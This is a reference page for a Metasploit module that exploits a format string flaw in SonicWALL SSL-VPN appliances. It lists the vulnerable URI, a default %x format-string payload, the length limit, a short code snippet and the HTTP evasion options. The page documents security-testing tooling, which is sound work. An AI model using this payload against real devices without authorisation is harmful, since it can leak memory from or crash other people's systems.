SonicWALL SSL-VPN Format String Vulnerability - Metasploit


This page contains detailed information about how to use the auxiliary/dos/http/sonicwall_ssl_format metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: SonicWALL SSL-VPN Format String Vulnerability
Module: auxiliary/dos/http/sonicwall_ssl_format
Source code: modules/auxiliary/dos/http/sonicwall_ssl_format.rb
Disclosure date: 2009-05-29
Last modification time: 2020-10-02 17:38:06 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: -

There is a format string vulnerability within the SonicWALL SSL-VPN Appliance - 200, 2000 and 4000 series. Arbitrary memory can be read or written to, depending on the format string used. There appears to be a length limit of 127 characters of format string data. With physical access to the device and debugging, this module may be able to be used to execute arbitrary code remotely.

Module Ranking and Traits


Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage


msf > use auxiliary/dos/http/sonicwall_ssl_format
msf auxiliary(sonicwall_ssl_format) > show targets
    ... a list of targets ...
msf auxiliary(sonicwall_ssl_format) > set TARGET target-id
msf auxiliary(sonicwall_ssl_format) > show options
    ... show and set options ...
msf auxiliary(sonicwall_ssl_format) > exploit

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Go back to menu.

Msfconsole Usage


Here is how the dos/http/sonicwall_ssl_format auxiliary module looks in the msfconsole:

msf6 > use auxiliary/dos/http/sonicwall_ssl_format

msf6 auxiliary(dos/http/sonicwall_ssl_format) > show info

       Name: SonicWALL SSL-VPN Format String Vulnerability
     Module: auxiliary/dos/http/sonicwall_ssl_format
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2009-05-29

Provided by:
  aushack <[email protected]>

Check supported:
  No

Basic options:
  Name     Current Setting                      Required  Description
  ----     ---------------                      --------  -----------
  FORMAT   %x%x%x%x%x%x%x                       yes       Format string (i.e. %x, %s, %n, %p etc)
  Proxies                                       no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                                        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT    443                                  yes       The target port (TCP)
  SSL      true                                 yes       Use SSL
  URI      /cgi-bin/welcome/VirtualOffice?err=  yes       URI to request
  VHOST                                         no        HTTP server virtual host

Description:
  There is a format string vulnerability within the SonicWALL SSL-VPN 
  Appliance - 200, 2000 and 4000 series. Arbitrary memory can be read 
  or written to, depending on the format string used. There appears to 
  be a length limit of 127 characters of format string data. With 
  physical access to the device and debugging, this module may be able 
  to be used to execute arbitrary code remotely.

References:
  http://www.securityfocus.com/bid/35145
  OSVDB (54881)
  http://www.aushack.com/200905-sonicwall.txt

Module Options


This is a complete list of options available in the dos/http/sonicwall_ssl_format auxiliary module:

msf6 auxiliary(dos/http/sonicwall_ssl_format) > show options

Module options (auxiliary/dos/http/sonicwall_ssl_format):

   Name     Current Setting                      Required  Description
   ----     ---------------                      --------  -----------
   FORMAT   %x%x%x%x%x%x%x                       yes       Format string (i.e. %x, %s, %n, %p etc)
   Proxies                                       no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                                        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT    443                                  yes       The target port (TCP)
   SSL      true                                 yes       Use SSL
   URI      /cgi-bin/welcome/VirtualOffice?err=  yes       URI to request
   VHOST                                         no        HTTP server virtual host

Advanced Options


Here is a complete list of advanced options supported by the dos/http/sonicwall_ssl_format auxiliary module:

msf6 auxiliary(dos/http/sonicwall_ssl_format) > show advanced

Module advanced options (auxiliary/dos/http/sonicwall_ssl_format):

   Name                  Current Setting                                     Required  Description
   ----                  ---------------                                     --------  -----------
   DOMAIN                WORKSTATION                                         yes       The domain to use for Windows authentication
   DigestAuthIIS         true                                                no        Conform to IIS, should work for most servers. Only set to false for non-IIS servers
   FingerprintCheck      true                                                no        Conduct a pre-exploit fingerprint verification
   HttpClientTimeout                                                         no        HTTP connection and receive timeout
   HttpPassword                                                              no        The HTTP password to specify for authentication
   HttpRawHeaders                                                            no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace             false                                               no        Show the raw HTTP requests and responses
   HttpTraceColors       red/blu                                             no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly  false                                               no        Show HTTP headers only in HttpTrace
   HttpUsername                                                              no        The HTTP username to specify for authentication
   SSLVersion            Auto                                                yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   UserAgent             Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)  no        The User-Agent header to use for all requests
   VERBOSE               false                                               no        Enable detailed status messages
   WORKSPACE                                                                 no        Specify the workspace for this module

Auxiliary Actions


This is a list of all auxiliary actions that the dos/http/sonicwall_ssl_format module can do:

msf6 auxiliary(dos/http/sonicwall_ssl_format) > show actions

Auxiliary actions:

   Name  Description
   ----  -----------

Evasion Options


Here is the full list of possible evasion options supported by the dos/http/sonicwall_ssl_format auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 auxiliary(dos/http/sonicwall_ssl_format) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

FORMAT string length cannot exceed 125 bytes.


Here is a relevant code snippet related to the "FORMAT string length cannot exceed 125 bytes." error message:

36:	    ])
37:	  end
38:	
39:	  def run
40:	    if (datastore['FORMAT'].length > 125) # Max length is 127 bytes
41:	      print_error("FORMAT string length cannot exceed 125 bytes.")
42:	      return
43:	    end
44:	
45:	    fmt = datastore['FORMAT'] + "XX"  # XX is 2 bytes used to mark end of memory garbage for regexp
46:	    begin

Go back to menu.


References


See Also


Check also the following modules related to this module:

Authors


  • aushack

Version


This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.